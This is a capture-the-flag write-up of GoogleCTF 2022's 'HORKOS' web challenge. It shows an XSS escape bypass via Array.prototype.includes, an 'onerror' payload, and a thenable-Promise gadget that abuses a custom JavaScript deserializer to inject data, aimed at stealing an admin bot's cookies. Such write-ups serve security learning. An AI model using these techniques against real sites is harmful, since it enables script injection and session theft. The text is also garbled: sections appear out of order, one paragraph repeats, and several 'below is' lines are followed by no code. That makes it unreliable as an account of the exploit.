We have all heard about insecure deserialization vulnerabilities and have seen many real-world cases in Java, PHP, and other languages.
But we rarely hear about this vulnerability in JavaScript. I think it's because the built-in serialization/deserialization functions, JSON.stringify and JSON.parse, only handle basic data structures such as strings, numbers, arrays, and objects.
Classes and functions are not supported, so there is no way to run malicious code during deserialization.
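To make that limitation concrete, here is a minimal sketch showing that a JSON round trip drops functions and class identity. The Cart class and its fields are hypothetical and are not taken from the challenge.

```javascript
// Hypothetical class used only for illustration.
class Cart {
  constructor() {
    this.items = ['tomato'];
    this.onCheckout = () => 'side effect';
  }
}

const original = new Cart();
const roundTripped = JSON.parse(JSON.stringify(original));

// Function-valued properties are silently omitted by JSON.stringify.
console.log('onCheckout' in roundTripped); // false
// The result is a plain object; the link to Cart.prototype is gone.
console.log(roundTripped instanceof Cart); // false
console.log(Object.getPrototypeOf(roundTripped) === Object.prototype); // true
console.log(roundTripped.items); // [ 'tomato' ]
```

Only plain data survives, so nothing attacker-controlled can run as part of JSON.parse itself.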
What if we implement our own deserialization logic that supports classes and functions? What could possibly go wrong?
GoogleCTF 2022 has a web challenge called "HORKOS," which shows us the way.
Overview
Before digging into the vulnerability in the challenge, we need to know how it works first.
This challenge is like a shopping website:
After selecting what you want and pressing the "CHECKOUT" button, a request will be sent to POST /order with a JSON string.
Here is what the JSON looks like when I add one tomato to my shopping cart:
That's it. It seems to be a tiny web application without many features.
Source code - rendering
Let's see how it works under the hood.
Below is the source code for the core function:
const script = new VMScript(fs.readFileSync('./shoplib.mjs').toString().replaceAll('export ','') + `
sendOrder(cart, orders)
`);
app.post('/order', recaptcha.middleware.verify, async (req,res)=>{
  req.setTimeout(1000);
  if (req.recaptcha.error && process.env.NODE_ENV != "dev") {
    res.writeHead(400, {'Content-Type': 'text/html'});
    return await res.end("invalid captcha");
  }
  if (!req.body.cart) {
    res.writeHead(400, {'Content-Type': 'text/html'});
    return await res.end("bad request")
  }
  // TODO: Group orders by zip code
  let orders = [];
  let cart = req.body.cart;
  let vm = new VM({sandbox: {orders, cart}});
  let result = await vm.run(script);
  orders = new Buffer.from(JSON.stringify(orders)).toString('base64');
  let url = '/order#' + orders;
  bot.visit(CHALL_URL + url);
  res.redirect(url);
});
Our input, req.body.cart, is passed to a VM that runs sendOrder(cart, orders).
After sendOrder runs, the orders array is updated, base64-encoded, and appended to the /order URL as the hash fragment. Then, the user is redirected to the order page, and a bot also visits the page.
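The round trip between the server and the order page can be sketched as follows. This is a simplified illustration for Node.js, with a hypothetical placeholder order instead of real challenge data.

```javascript
// Server side: serialize the orders and place them in the URL fragment.
const orders = [{ example: 'order' }]; // hypothetical placeholder data
const encoded = Buffer.from(JSON.stringify(orders)).toString('base64');
const url = '/order#' + encoded;

// Client side: read the fragment back, as location.hash.substr(1) would.
const fragment = url.slice(url.indexOf('#') + 1);
const decoded = JSON.parse(atob(fragment));

console.log(url);
console.log(decoded);
```

Whatever ends up in the orders array is what the order page (and the bot) will later decode and render.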
Here is the JavaScript code on the order page:
import * as shop from "/js/shoplib.mjs";
window.onload = () => {
  let orders = JSON.parse(atob(location.hash.substr(1)));
  console.log(orders);
  (orders).forEach((order) => {
    const client = new shop.DeliveryClient(order);
    document.all.order.innerHTML += client;
  })
}
The client object is appended to innerHTML. If we can inject HTML here, we get an XSS that allows us to steal information (such as cookies) from the admin bot.
Below is the related code snippet for rendering HTML:
There is an escapeHtml function that does the sanitization: it encodes every < if < is in the input.
Also, we can see that almost all variables are escaped before being rendered to the page, so it seems that we have no chance to do something bad?
Not exactly, if you look very carefully.
In the renderLines function, this line is different:
<p>${escapeHtml(c.key).toString()}</p>
Why? Because everywhere else the pattern is escapeHtml(something.toString()), which casts the input to a string and then escapes it, but the line above casts to a string after escaping.
If you are familiar with JavaScript, you know that besides String.prototype.includes, there is another function with the same name: Array.prototype.includes.
String.prototype.includes checks whether the target is a substring of the string, while Array.prototype.includes checks whether the target is an element of the array.
For example, ['<p>hello</p>'].includes('<') is false because there is no '<' element in the array.
In other words, if c.key is an array, we can bypass the check and render <, which causes XSS.
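The bypass can be reproduced in isolation. The escapeHtml below is an assumed reconstruction based only on the description above (encode every < when the input includes <); the challenge's real function may differ in detail.

```javascript
// Assumed reconstruction of the sanitizer, not the challenge's exact code.
const escapeHtml = (input) =>
  input.includes('<')
    ? input.replace(/</g, (c) => `&#${c.charCodeAt(0)};`)
    : input;

const payload = '<img src=x onerror=alert(1)>';

// String input: String.prototype.includes finds '<', so it is encoded.
const safe = escapeHtml(payload).toString();

// Array input: Array.prototype.includes looks for an element equal to '<',
// finds none, and the array is returned untouched. toString() then joins it.
const unsafe = escapeHtml([payload]).toString();

console.log(safe);   // &#60;img src=x onerror=alert(1)>
console.log(unsafe); // <img src=x onerror=alert(1)>
```

Calling toString() before escaping would have turned the array into a string first, and the check would have worked as intended.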
Now, we have already finished the second half of the challenge. All we need to do is to find the solution for the first half: "how do we make c.key an array?"
Source code - generating order data
As I mentioned earlier, the order data is generated by the sendOrder function. Our goal is to find a vulnerability in its implementation and manipulate the order data.
In Driver.sendOrder, the driver is assigned to the order, and pickle.dumps(order) is pushed to this.orders, which is returned to the user and shown on the /order page in the end.
The first thing I noticed is that I can create a function if the type is Function, because globalThis['Function'] is the function constructor.
If I could find a way to run the function, I would get RCE in the sandbox and could manipulate the orders. But I couldn't find one at that point.
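As a rough illustration of why a name-based lookup on globalThis is dangerous, the sketch below resolves a constructor from a string. The typeName variable is hypothetical, and this is not how pickle.loads is actually written.

```javascript
// Hypothetical attacker-controlled type name.
const typeName = 'Function';
const Ctor = globalThis[typeName];

console.log(Ctor === Function); // true

// The Function constructor compiles its last argument as the function body.
const fn = new Ctor('return 1 + 1');

// Nothing has executed yet; the body only runs if something calls fn.
console.log(typeof fn); // function
console.log(fn());      // 2
```

Creating the function is the easy part. The open question is finding a code path that calls it.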
The second thing I tried was to set key to __proto__, so that I could control obj.__proto__.__proto__, which is Object.prototype.__proto__, the prototype of Object.prototype.
But this does not work because it's not allowed. You will get an error like this:
TypeError: Immutable prototype object '#<Object>' cannot have their prototype set
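The error can be reproduced outside the challenge. A minimal sketch, assuming a standards-compliant engine such as the V8 build in Node.js (the exact message text varies by engine):

```javascript
let message = null;
try {
  // Object.prototype is an immutable prototype exotic object:
  // its [[Prototype]] is null and cannot be changed to anything else.
  Object.setPrototypeOf(Object.prototype, { polluted: true });
} catch (err) {
  message = `${err.name}: ${err.message}`;
}

console.log(message);
console.log(Object.getPrototypeOf(Object.prototype)); // null
```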
The third thing I came up with is "prototype confusion". Look at this part:
pickle.loads always returns an object, so obj[key] is an object. But if the type is pickledString, its prototype will be String.prototype.
So, we can have a weird object whose prototype is String.prototype. We messed up the prototype! Unfortunately, it's useless in this challenge.
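Here is a small sketch of what such a confused object looks like. It uses Object.setPrototypeOf directly instead of the challenge's pickle code, so treat it as an approximation of the effect only.

```javascript
// A plain object whose prototype is swapped to String.prototype.
const weird = Object.setPrototypeOf({ key: 'value' }, String.prototype);

console.log(typeof weird);            // object
console.log(weird instanceof String); // true

// String.prototype methods require a real string value as `this`,
// so calling them on this fake "string" throws.
let error = null;
try {
  weird.toString();
} catch (err) {
  error = err;
}
console.log(error instanceof TypeError); // true
```

The object passes an instanceof check, but it has no internal string data, which limits what can be done with it.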
After playing around with the pickle function for hours and finding nothing useful, I decided to take a step back.
The essence of insecure deserialization
The most suspicious part of the challenge is the pickle function, which is responsible for deserializing data. So, I assumed it's a challenge about insecure deserialization.
What is the essence of insecure deserialization? Or, to put it another way, what makes deserialization "insecure"?
My answer is: "unexpected object" and "magic function".
For example, when an application deserializes something, it is usually just to load its own data. Deserialization becomes a vulnerability because it can be exploited to load an "unexpected object", like the common gadgets in popular libraries.
Also, the "magic function" is important in PHP, like __wakeup, __destruct, __toString, and so on. Those magic functions can help the attacker find a gadget.
Back to the challenge: it's written in JavaScript, so what are the magic functions in JavaScript?
toString
valueOf
toJSON
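These three methods are "magic" in the sense that the language calls them implicitly. A minimal sketch with a hypothetical object that records which method each operation triggers:

```javascript
const calls = [];
const obj = {
  toString() { calls.push('toString'); return 'str'; },
  valueOf()  { calls.push('valueOf');  return 42; },
  toJSON()   { calls.push('toJSON');   return { replaced: true }; },
};

const asTemplate = `${obj}`;        // string conversion calls toString
const asNumber = obj + 1;           // default-hint conversion calls valueOf
const asJson = JSON.stringify(obj); // JSON.stringify calls toJSON

console.log(asTemplate, asNumber, asJson); // str 43 {"replaced":true}
console.log(calls); // [ 'toString', 'valueOf', 'toJSON' ]
```

If a deserialized object reaches any of these operations, attacker-supplied methods run without an explicit call in the application code.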
So, based on this new mindset, I rechecked the code to see if I could find somewhere interesting.
Although none of the functions has been called on our deserialized object, I did find an interesting place:
Look at the sendOrder function: it's an async function and it returns this.order.orderId. This means that if this.order.orderId is a Promise, it will be resolved, even without await.
async function test() {
  const p = new Promise(resolve => {
    console.log('hello')
    resolve()
  })
  return p
}
test()
Paste it into the browser console and run it; you will see hello printed in the console.
It's easy to build a serialized Promise. We only need a then function:
async function test() {
  var obj = {
    then: function(resolve) {
      console.log(123)
      resolve()
    }
  }
  // we don't even need this actually
  obj.__proto__ = Promise.prototype
  return obj
}
// we don't need await here
test()
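Combining this with the Function constructor observation from earlier gives the core of the attack. The sketch below is a simplified stand-in, not the challenge code: sendOrder, the global orders array, and the injected string are all hypothetical, and then is built from a string the way a deserializer that can construct functions might build it.

```javascript
// Hypothetical stand-in for the sandbox's shared orders array.
globalThis.orders = [];

// Hypothetical async function that returns attacker-controlled data.
async function sendOrder(order) {
  return order.orderId; // no await, no explicit call to then
}

// Build `then` from a string. arguments[0] is the resolve callback;
// it must be called, otherwise the returned promise never settles.
const then = new Function(
  'globalThis.orders.push("injected"); arguments[0]("done");'
);

const resultPromise = sendOrder({ orderId: { then } }).then((value) => ({
  value,
  orders: globalThis.orders,
}));

resultPromise.then((result) => console.log(result));
// { value: 'done', orders: [ 'injected' ] }
```

The then function runs as a side effect of returning the object from an async function, which is enough to modify shared state such as the orders array.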
After that, the user will be redirected to another /order page to see the order:
It's worth noting that the URL looks like this:
It's obviously a base64-encoded string. If we decode it, the result is another similar JSON string:
As I mentioned earlier, the order data is generated by the sendOrder function. Our goal is to find a vulnerability in its implementation and manipulate the order data. Below is the related source code:
First, sendOrder is called, and our input (value) is parsed as JSON and then deserialized by pickle.loads.
Then, a new DeliveryService is created and delivery.sendOrder is called.
In DeliveryService.sendOrder, a random driver is picked to send the order, and this.order.orderId is returned.
In Driver.sendOrder, the driver is assigned to the order, and pickle.dumps(order) is pushed to this.orders, which is returned to the user and shown on the /order page in the end.
How does deserialization work?
In JavaScript, a class instance is just an object whose constructor points to the class and whose __proto__ points to the prototype of the class.
So, it's easy to create an instance of A without the new operator:
It's basically what pickle.loads does: recreate the object and assign the correct prototype according to the type key.
Trying to mess up prototype
After understanding how it works, my first thought was to mess up the prototype chain to achieve something unexpected.
This part is the most suspicious, in my opinion:
The serialized object looks like this:
arguments[0] is the resolve function. We need to call it; otherwise, the program hangs.
As I mentioned earlier, if we can find a way to run a function, we can push our payload to orders.
Exploitation
To sum up, we can get the flag by the following steps:
Put a then function in the orderId
Use globalThis.orders to insert our data with the XSS payload
Below is what I use to test and generate the payload:
(BTW, we don't actually need to insert a new record; we can just modify orders[0] to hold our XSS payload. It's easier and also works.)
Conclusion
This challenge shows us how a simple deserialization function can be abused by crafting a Promise with a malicious then function.
You can return anything in an async function, but if you return a Promise, it will be resolved first, as per the MDN documentation.
Thanks to Pew for solving the second part, and to the other team members for the great teamwork.